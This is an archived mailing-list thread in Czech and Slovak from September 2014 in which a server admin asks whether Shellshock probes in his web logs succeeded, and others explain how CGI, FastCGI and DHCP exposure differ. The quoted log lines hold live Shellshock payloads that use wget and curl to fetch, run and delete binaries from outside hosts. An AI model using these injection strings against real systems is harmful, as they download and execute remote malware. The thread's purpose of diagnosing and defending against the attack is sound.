29 Sep
2014
29 Sep
'14
9:53 a.m.
Tymto ovsem nechcem podcenovat vaznost tej chyby a dolezitost updatu, len som chcel
poukazat na to ze webserver zrovna nie je pri tejto chybe najzranitelnejsi. DHCP vidim
ako daleko zranitelnejsi, prip. to, ze kvoli tejto chybe sa moze stat lahko zranitelnou
nejaka nahodna aplikacia/utilita ktoru na masine mozete mat.
On 29 Sep 2014, at 11:42, Ján Raška
<raskaj(a)gmail.com> wrote:
Osobne si myslim ze 200 odpovede nemusia nic znamenat. Ked si vsimnes, 404 to vratilo pri
/test a /cgi-bin/test.sh co su URL ktore ocividne nemas, ale / ocividne mas :) a tam to
vratilo 200.
Ono aj ked mas zranitelny bash, stale sa nic nemuselo stat, problem je hlavne ak web bezi
cez CGI, a co som sa o tom bavil so sysadminom jedneho zakaznika, tak pri FastCGI (bezne
riesenie pri PHP pod nginx) SCGI a pod. vraj treba aby bash bol pouzity ako CGI jazyk,
lebo FastCGI a pod. nepouzivju premenne prostredia na posuvanie informacii skriptu. A
uprimne povedane, nepoznam vela webov ktore dnes bezia cez klasicke CGI, a pouzit bash ako
skriptovaci jazyk pre FastCGI mi teda ako dobry napad nepride :)
Anyways, 200 znamena, ze tvoj webserver uspesne spracoval request, a pokial zrovna
nepouzivas CGI, tak mas viac menej Ty kontrolu nad tym ci je mozne obsah tych params
spustit v shelli alebo nie :)
On 29 Sep 2014, at 10:37, Jan B. Kolář
<janbivoj.kolar(a)zazen-nudu.cz> wrote:
Díky za odpovědi,
ano, to jsem si myslel. Mě právě zarazilo, že v logu mám nějaké odpovědi 200:
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /test HTTP/1.0" 404 168
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:30 +0200] "GET /cgi-bin/test.sh HTTP/1.0"
404 168 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
70.42.149.67 - - [28/Sep/2014:08:16:31 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z
74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
212.51.60.58 - - [29/Sep/2014:00:30:18 +0200] "GET / HTTP/1.0" 200 3296
"-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot
-O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
/tmp/sh\x22"
A to přesto, že jsem bash aktualizoval už 24. a 26.9. (mám aktuální verzi Debianu). Viz
výpis "less /var/log/apt/history.log":
Start-Date: 2014-09-24 16:38:28
Upgrade: bash:amd64 (4.2+dfsg-0.1, 4.2+dfsg-0.1+deb7u1)
End-Date: 2014-09-24 16:38:34
Start-Date: 2014-09-26 08:39:57
Install: php5-cli:amd64 (5.4.33-1~dotdeb.1)
End-Date: 2014-09-26 08:40:18
Start-Date: 2014-09-26 15:10:51
Upgrade: bash:amd64 (4.2+dfsg-0.1+deb7u1, 4.2+dfsg-0.1+deb7u3)
End-Date: 2014-09-26 15:11:23
Poradíte, co teď dál?
Honza
On 29.9.2014 10:12, Petr Krcmar wrote:
Dne 29.9.2014 v 10:08 "Jan B. Kolář"
napsal(a):
_______________________________________________
Community-list mailing list
Community-list(a)lists.vpsfree.cz
http://lists.vpsfree.cz/listinfo/community-list možná hloupá otázka - dá se nějak z logu zjistit,
zda ten průnik byl
úspěšný či nikoliv?
Dá se zjistit, jestli útočník tipnul správný soubor. Pokud tam
vidíš
404, tak se určitě nikam nedostal a neexistuje skript, který měl možnost
ten podvržený kód zpracovat. Pokud ovšem v logu vidíš 200, pak útočník
kód dostal k serveru, dostal výstup, ale už nevíš, co se dělo dál.
Jestli byl útok úspěšný tam nevyčteš.